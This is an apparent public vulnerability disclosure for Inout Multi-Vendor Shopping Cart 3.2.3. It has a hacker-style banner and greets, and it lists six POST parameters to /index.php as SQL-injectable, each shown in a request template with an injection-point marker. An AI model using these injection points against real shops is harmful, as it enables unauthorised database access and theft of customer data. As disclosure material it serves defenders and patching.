Inout Multi-Vendor Shopping Cart version 3.2.3 suffers from a remote SQL injection vulnerability.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Vulnerability ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr :
β Website : inoutscripts.com β
β Vendor : Inout Scripts - Nesote Technologies Private Limited β
β Software : Inout Multi-Vendor Shopping Cart 3.2.3 β
β Vuln Type: SQL Injection β
β Impact : Database Access β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β β
β SQL injection attacks can allow unauthorized access to sensitive data, modification of β
β data and crash the application or make it unavailable, leading to lost revenue and β
β damage to a company's reputation. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2023 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Path: /index.php
POST parameter 'val' is vulnerable to SQLI
val=All[INJECT-HERE]&category=9%20&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=
POST parameter 'category' is vulnerable to SQLI
val=All&category=9%20[INJECT-HERE]&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=
POST parameter 'startpage' is vulnerable to SQLI
val=All&category=9 &startpage=0[INJECT-HERE]&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=
POST parameter 'real_price_min' is vulnerable to SQLI
val=All&category=9 &startpage=0&real_price_min=250[INJECT-HERE]&real_price_max=34222&vendorid=0&size=&color=
POST parameter 'real_price_max' is vulnerable to SQLI
val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222[INJECT-HERE]vendorid=0&size=&color=
POST parameter 'vendorid' is vulnerable to SQLI
val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222&vendorid=0[INJECT-HERE]&size=&color=
[-] Done
